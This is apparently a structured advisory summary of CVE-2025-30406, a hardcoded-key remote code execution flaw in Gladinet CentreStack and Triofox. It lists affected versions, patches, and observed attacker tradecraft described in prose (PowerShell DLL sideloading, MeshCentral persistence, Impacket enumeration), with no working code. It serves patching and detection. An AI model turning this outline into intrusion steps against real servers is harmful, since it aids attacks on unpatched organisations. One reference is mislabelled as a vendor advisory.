Full Report
A recently disclosed security flaw in Gladinet CentreStack also impacts its Triofox remote access and collaboration solution, according to Huntress, with seven different organizations compromised to date. Tracked as CVE-2025-30406 (CVSS score: 9.0), the vulnerability refers to the use of a hard-coded cryptographic key that could expose internet-accessible servers to remote code execution attacks
Analysis Summary
# Vulnerability: Critical RCE in Gladinet Triofox and CentreStack due to Hardcoded Key
## CVE Details
- CVE ID: CVE-2025-30406
- CVSS Score: 9.0 (Critical)
- CWE: Not explicitly listed, but related to poor cryptographic practices/hardcoded secrets.
## Affected Systems
- Products: Gladinet CentreStack and Gladinet Triofox
- Versions: Prior versions of CentreStack through 16.4.10315.56368. Prior versions of Triofox up to 16.4.10317.56372.
- Configurations: Internet-accessible servers running the affected software.
## Vulnerability Description
The vulnerability stems from the use of a hard-coded cryptographic key within the configuration files of both CentreStack and Triofox versions prior to the fixes. This flaw allows an attacker to abuse these keys remotely to achieve Remote Code Execution (RCE) on the affected servers.
## Exploitation
- Status: Exploited in the wild (Active zero-day exploitation reported since March 2025).
- Complexity: Implied Low (easily abused due to hardcoded keys).
- Attack Vector: Network (Remote).
### Post-Exploitation Activity Observed
Attackers have been observed leveraging the RCE flaw to:
1. Download and sideload a DLL using an encoded PowerShell script.
2. Conduct lateral movement.
3. Install MeshCentral for persistent remote access (MeshAgent observed running).
4. Run Impacket PowerShell commands for enumeration.
## Impact
- Confidentiality: High (Allows code execution, leading to potential data access).
- Integrity: High (Allows code execution and system modification).
- Availability: High (Allows control over the system).
## Remediation
### Patches
- CentreStack: Version **16.4.10315.56368** (Released April 3, 2025).
- Triofox: Version **16.4.10317.56372** or later.
### Workarounds
The article strongly recommends immediate updating to the patched versions due to active exploitation. No specific workarounds are detailed, emphasizing patching as the primary defense.
## Detection
- Indicators of Compromise (IOCs):
- Presence of downloaded DLL files sideloaded via PowerShell.
- Execution of encoded PowerShell scripts.
- Execution of Impacket PowerShell commands for enumeration.
- Installation of MeshAgent/MeshCentral for remote access.
- Detection methods and tools: Monitoring endpoint activity, script execution, and network connections to known C2 infrastructure (specific IPs/domains are not listed in the summary).
## References
- Vendor Advisory (CentreStack): hxxps://thehackernews.com/2025/04/cisa-warns-of-centrestacks-hard-coded.html
- Vendor Advisory (Triofox): hxxps://gladinetsupport.s3.us-east-1.amazonaws.com/gladinet/securityadvisory-cve-2025-triofox.pdf
- Research Report (Huntress): hxxps://www.huntress.com/blog/cve-2025-30406-critical-gladinet-centrestack-triofox-vulnerability-exploited-in-the-wild